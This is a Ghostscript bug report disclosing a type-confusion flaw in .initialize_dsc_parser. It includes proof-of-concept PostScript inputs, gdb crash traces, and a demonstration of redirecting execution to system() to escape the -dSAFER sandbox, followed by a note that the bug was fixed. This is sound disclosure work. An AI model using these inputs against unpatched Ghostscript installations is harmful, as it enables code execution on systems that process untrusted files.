Bug 697190 - .initialize_dsc_parser doesn't validate the parameter is a dict type before using it.
.initialize_dsc_parser doesn't validate the parameter is a dict type before u...
Status: RESOLVED FIXED
Product: Ghostscript
Classification: Unclassified
Component: General
9.20
PC Linux
: P4 normal
Assigned To: Ken Sharp
Bug traffic
:
Depends on:
Blocks:
  Show dependency treegraph
 
Reported: 2016-10-04 15:23 PDT by Tavis Ormandy
Modified: 2016-10-05 05:17 PDT (History)
1 user (show)

See Also:
Customer:
Word Size: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Tavis Ormandy 2016-10-04 15:23:22 PDT
.initialize_dsc_parser doesn't validate the parameter is a dict type before using it.

This is a security issue, because it can be abused to escape the -dSAFER sandbox.

GS>16#4141414141414141 .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65754 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:154
154	    gs_memory_t * const mem = (gs_memory_t *)dict_memory(pdict);
(gdb) x/i $pc
=> 0xa65754 <zinitialize_dsc_parser+43>:	mov    rax,QWORD PTR [rax+0x48]
(gdb) p/x $rax
$3 = 0x4141414141414141

Or trying random other types:

GS>currentdevice .initialize_dsc_parser

Program received signal SIGSEGV, Segmentation fault.
0x0000000000a65775 in zinitialize_dsc_parser (i_ctx_p=0x1dd0af0) at ./psi/zdscpars.c:155
155	    dsc_data_t * const data =
(gdb) x/i $pc
=> 0xa65775 <zinitialize_dsc_parser+76>:	call   rax
(gdb) p/x $rax
$10 = 0xc045894cc84d89cc
(gdb) x/x $rax
0xc045894cc84d89cc:	Cannot access memory at address 0xc045894cc84d89cc
Comment 1 Tavis Ormandy 2016-10-04 16:16:47 PDT
This looks pretty simple to exploit, it's possible to bypass ASLR using bug 697169 and reading /proc/self/maps, then you can simply call any routine you want.

(gdb) p system
$1 = {int (const char *)} 0x7ffff6ef4220 <system>
(gdb) r
GPL Ghostscript 9.20 (2016-09-26)
Copyright (C) 2016 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>16#4141414141414141 [16#4141414141414141 16#4141414141414141 16#7ffff6ef4220 16#4141414141414141] .initialize_dsc_parser
sh: -c: line 0: syntax error near unexpected token `)'
sh: -c: line 0: `
                  hU)iAAAAAAAA|��'
Comment 2 Ken Sharp 2016-10-05 05:17:55 PDT
Fixed in commit 875a0095f37626a721c7ff57d606a0f95af03913